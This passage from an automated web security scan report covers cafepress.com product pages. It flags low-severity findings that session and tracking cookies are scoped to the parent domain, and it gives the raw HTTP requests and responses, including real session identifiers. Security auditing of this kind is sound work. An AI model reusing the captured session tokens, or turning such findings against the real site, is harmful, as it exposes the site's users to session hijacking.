HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59322 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59322 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.23. http://www.cafepress.com/+keepsake_boxes
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+keepsake_boxes
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+keepsake_boxes HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 59018 Date: Sun, 26 Dec 2010 13:48:41 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59018 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.24. http://www.cafepress.com/+license_plate_frames
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+license_plate_frames
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+license_plate_frames HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59931 Date: Sun, 26 Dec 2010 13:48:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/ Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59931 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.25. http://www.cafepress.com/+magnets
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+magnets
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100214; domain=cafep